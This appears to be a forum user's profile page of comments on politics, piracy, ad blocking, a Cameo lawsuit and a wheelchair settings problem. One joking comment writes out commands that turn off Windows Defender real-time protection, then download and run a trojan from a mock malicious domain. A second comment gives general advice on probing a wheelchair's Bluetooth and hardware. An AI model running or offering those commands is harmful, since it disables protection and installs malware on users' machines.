Spyke

Replies

news

Comment on

Alabama Mayor Kills Self After Right-Wing Blog Outs His Cross-Dressing

Reply in thread

I love what John Oliver said on his segment about I believe Lindsay Graham.

Paraphrasing, he could have helped usher in the change that would have made his lifestyle more acceptable and more inclusive. But he wanted power.

These people choose to be a Republican. They choose to associate with a party that is actively trying to eliminate the very people they are and the sad thing is that they think they are the exception. They think the party will accept them.

And the hard, harsh truth is that they are only accepted so long as it's convenient. I think he knew this and that's why he chose to end his life.

It's sad that he felt he had to do that. But I'm not holding my breath for the GOP to say that they learned a lesson from it.

Comment on

Unremoval of Piracy Communities

Reply in thread

From lemmy.world's perspective, I get it. Our current legal framework makes it damn near impossible from a financial standpoint to take a stand against corporations with pocketbooks the size of some first world countries.

But the rise in piracy is a direct consequence of these corporations' actions against their very users.

Piracy has and always will be a service problem. I don't think lemmy should be used to share torrents for example. But honest discussion about the current state of affairs and alternatives should be allowed.

The admins took a measured approach here and it's one that is refreshing given the regime that many of us came from.

piracy

Comment on

YouTube's anti-adblock rollout has finally arrived for Firefox users

Anyone else remember the first ad-pocalypse?

Like when OG AdBlock was created and there was an all-out race between individual websites and AdBlock?

Then OG AdBlock sold out and allowed "approved" ads to still show.

We are seeing history repeat. The only reason ads survived was due to increasing number of users who weren't using adblock.

Now, with market saturation, Google is starting to fight back.

I would absolutely love to see a revitalization on proxy software specifically designed to eliminate ads and tracking. I haven't looked into this in quite some time but I think we're crossing into this territory now.

The pessimist in me says to look out for a bill authored by Google to make adblocking illegal.

But the optimist in me says "the Internet sees censorship as damage and routes around it."

news

Comment on

George Santos sues late-night host Jimmy Kimmel for tricking him into making videos to ridicule him

Reply in thread

For each CAMEO Video (other than a Business CAMEO Video), you hereby grant to the User and the Recipient a non-exclusive, royalty-free, fully paid, worldwide, sublicensable, and perpetual license to use, reproduce, distribute, and publicly display the CAMEO Video, in each case, solely in accordance with the Site Terms, in any and all media, whether now known or hereafter invented or devised (including social media channels and third-party websites and platforms).

I'm only a humbly country space chicken lawyer but the terms explicitly say that Kimmel can do whatever the fuck he wants with the recording.

gaming

Comment on

Ignorance is bliss

Reply in thread

Set-MpPreference -DisableRealtimeMonitoring $true

Disables malware scanning in windows (I assume)

curl https://malwarefo.ru/supertrojan.exe

Downloads supertrojan.exe from a Russian website

./supertrojan.exe

Executes the file

./game.exe

Runs the game

exit

Closes the command prompt.

0

Opens the portal to the underworld, to ensure that the command prompt closes correctly.

piracy

Comment on

Help with wheelchair software

Jesus fucking mother of Christ.

Ok, I'm going to skip my indignation.

I'm not an app developer or a wheel chair person. That said, we need some info to help you better.

  • What phone? Android or iOS?
  • link to the app (and a link it's APK or whatever iPhones equivalent to an APK would be)
  • instructions on how you register, e.g. is registration tied to your phone, the wheelchair, or both?

Here is some general hacking advice:

  • check online for your wheelchairs "provider" manual. I "hacked" my CPAP machine a few years back. My doctor forgot to turn on heated tubing and the setting was hidden behind a "provider" menu. Chances are good that there will be a similar manual for your wheelchair.
  • if you haven't already, search for the make and model of your wheelchair and see if there are forums or discussion boards
  • typically, physical access is the best access. Depending on how your phone communicates with the chair, you might able to spy on the signals that it uses. My guess is Bluetooth. It probably is encrypted but medical devices are notoriously easy skimpy on their tech security. Might be worth a try
  • If you have the tools and the knowledge, consider taking apart the wheelchair to access the physical components. Information like the processor, chip set, etc will make it easier to understand how it works. While you might expect custom boards and software, more and more devices are going the Raspberry Pi or Pico route because they are cheaper to manufacturer than to do a whole custom board. If it's a run of the mill consumer board, you have a lot more attack vectors.

Often settings like these are based on PKI(Public Key Infrastructure), meaning that the program on your wheelchair likely knows the public key for the company and will test any input to change the settings will require the private key. Again, generally speaking.

But also generally speaking, medical equipment, especially consumer equipment, has to deal with the lowest common denominator, meaning people who don't have apps, who don't know what a smart phone is, etc. Because of that, my hunch is that the setting is in plain text and you just need to change it.

You also have to remember that the people setting this up are often in doctors offices, which means it must be easy to do because time is of the essence. The doctor would not recommend their product if it takes more than a few minutes to set up.

I'm sorry I can't give you better more specific advice but hopefully you can figure this out.